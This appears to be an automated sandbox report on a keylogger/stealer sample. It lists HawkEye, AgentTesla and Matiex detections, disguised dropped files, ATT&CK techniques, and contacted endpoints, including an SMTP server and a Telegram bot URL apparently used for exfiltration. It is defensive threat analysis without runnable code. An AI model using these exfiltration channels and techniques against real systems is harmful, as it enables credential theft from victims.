Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: Pictures.exe	String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
Source: Pictures.exe	String found in binary or memory: HawkEyeKeylogger
Source: Pictures.exe	String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: Pictures.exe	String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000008.00000003.291239624.0000000004451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.283351079.000000000134C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.289168879.0000000003E3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.287788541.00000000044BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.278201176.000000000138F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.285048922.0000000004451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.284660390.0000000000AB2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.278060140.0000000001324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.287649744.00000000005D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.287852153.0000000003DD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.612763581.0000000002D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.604664953.0000000000AB2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.286730546.00000000044BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.612958072.0000000002DD2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe, type: DROPPED
Source: Yara match	File source: 12.0.PO456724392021.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.PO2345714382021.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PO456724392021.exe.ab0000.0.unpack, type: UNPACKEDPE

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pictures.exe PID: 6240, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED
Source: Yara match	File source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE

Yara detected Matiex Keylogger

Show sources

Source: Yara match	File source: 00000009.00000002.604546258.0000000000DB2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.281199501.0000000000DB2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LOGO AND PICTURES.exe PID: 6208, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe, type: DROPPED
Source: Yara match	File source: 9.0.LOGO AND PICTURES.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.LOGO AND PICTURES.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A20A8E listen,	10_2_04A20A8E
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A20E9E bind,	10_2_04A20E9E
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A20E6B bind,	10_2_04A20E6B
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A20A50 listen,	10_2_04A20A50

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation231	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools21	OS Credential Dumping2	Peripheral Device Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API2	Scheduled Task/Job1	Access Token Manipulation1	Deobfuscate/Decode Files or Information11	Input Capture211	File and Directory Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Process Injection412	Obfuscated Files or Information41	Credentials in Registry2	System Information Discovery126	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Scheduled Task/Job1	Software Packing13	Credentials In Files1	Query Registry1	Distributed Component Object Model	Input Capture211	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Security Software Discovery351	SSH	Clipboard Data1	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion16	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol23	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion16	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection412	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	System Network Configuration Discovery11	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
B6LNCKjOGt5EmFQ.exe	26%	ReversingLabs	Win32.Trojan.Razy
B6LNCKjOGt5EmFQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	100%	Avira	TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	100%	Avira	TR/Redcap.jajcu
C:\Users\user\AppData\Local\Temp\Pictures.exe	100%	Avira	TR/AD.MExecute.lzrac
C:\Users\user\AppData\Local\Temp\Pictures.exe	100%	Avira	SPR/Tool.MailPassView.473
C:\Users\user\AppData\Local\Temp\PO456724392021.exe	100%	Avira	TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\TcVfsyyjYuQ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Pictures.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\PO456724392021.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\TcVfsyyjYuQ.exe	26%	ReversingLabs	Win32.Trojan.Razy

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	100%	Avira	TR/Redcap.jajcu	Download File
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
12.0.PO456724392021.exe.ab0000.0.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
16.0.PO2345714382021.exe.5d0000.0.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
12.2.PO456724392021.exe.ab0000.0.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
10.0.Pictures.exe.150000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
10.0.Pictures.exe.150000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
10.2.Pictures.exe.150000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
10.2.Pictures.exe.150000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
9.0.LOGO AND PICTURES.exe.db0000.0.unpack	100%	Avira	TR/Redcap.jajcu	Download File
20.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
9.2.LOGO AND PICTURES.exe.db0000.0.unpack	100%	Avira	TR/Redcap.jajcu	Download File

Domains

Source	Detection	Scanner	Link
freegeoip.app	1%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://freegeoip.app	0%	URL Reputation	safe
https://freegeoip.app	0%	URL Reputation	safe
https://freegeoip.app	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
http://crl.usertrusts	0%	Avira URL Cloud	safe
https://www.geodatatool.com/en/?ip=3D84.17.52.74=0D=0A=	0%	Avira URL Cloud	safe
https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/	0%	URL Reputation	safe
https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/	0%	URL Reputation	safe
https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/	0%	URL Reputation	safe
http://checkip.dyndns.org/HB	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
https://www.geodatatool.com/en/?ip=84.17.52.74	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://freegeoip.app/xml/	0%	URL Reputation	safe
https://freegeoip.app/xml/	0%	URL Reputation	safe
https://freegeoip.app/xml/	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
https://www.geodatatool.com/en/?ip=	0%	URL Reputation	safe
https://www.geodatatool.com/en/?ip=	0%	URL Reputation	safe
https://www.geodatatool.com/en/?ip=	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://www.geodatatool.com/en/?ip=3D84.17.52.74=0D=0A=0D=0ADat=	0%	Avira URL Cloud	safe
https://freegeoip.app/xml/84.17.52.74	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.74	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.74	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
whatismyipaddress.com	104.16.154.36	true	false		high
freegeoip.app	172.67.188.154	true	false	1%, Virustotal, Browse	unknown
smtp.privateemail.com	199.193.7.228	true	false		high
checkip.dyndns.com	131.186.161.70	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown
94.197.2.0.in-addr.arpa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	Avira URL Cloud: safe	unknown
http://whatismyipaddress.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sectigo.com0	LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
https://freegeoip.app	LOGO AND PICTURES.exe, 00000009.00000002.611704602.0000000003299000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.com	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
http://ns.adobe.c/g	LOGO AND PICTURES.exe, 00000009.00000003.583245849.00000000092C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.kr	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.usertrusts	LOGO AND PICTURES.exe, 00000009.00000003.459012991.0000000006ADF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.geodatatool.com/en/?ip=3D84.17.52.74=0D=0A=	LOGO AND PICTURES.exe, 00000009.00000002.615373407.0000000003515000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/	LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://whatismyipaddress.com/-	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	false		high
http://checkip.dyndns.org/HB	LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8Win32_ComputerSystemModelManufactu	LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	false		high
http://www.ascendercorp.com/typedesigners.html	B6LNCKjOGt5EmFQ.exe, 00000000.00000003.226742441.0000000001CAB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.yahoo.com/config/login	Pictures.exe	false		high
http://www.fonts.com	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.geodatatool.com/en/?ip=84.17.52.74	LOGO AND PICTURES.exe, 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.nirsoft.net/	B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Pictures.exe	false		high
http://www.zhongyicts.com.cn	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.280326164.0000000003651000.00000004.00000001.sdmp, LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.291239624.0000000004451000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://freegeoip.app/xml/	LOGO AND PICTURES.exe, 00000009.00000002.611704602.0000000003299000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
https://sectigo.com/CPS0	LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adobe.cobj	LOGO AND PICTURES.exe, 00000009.00000003.583245849.00000000092C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.geodatatool.com/en/?ip=	LOGO AND PICTURES.exe, 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://smtp.privateemail.com	LOGO AND PICTURES.exe, 00000009.00000002.614076620.000000000348A000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	false		high
https://www.geodatatool.com/en/?ip=3D84.17.52.74=0D=0A=0D=0ADat=	LOGO AND PICTURES.exe, 00000009.00000002.612629984.00000000033B7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/GJD7Q5y.png195.239.51.11795.26.248.2989.208.29.13389.187.165.4792.118.13.1895.26	LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	false		high
https://freegeoip.app/xml/84.17.52.74	LOGO AND PICTURES.exe, 00000009.00000002.611704602.0000000003299000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
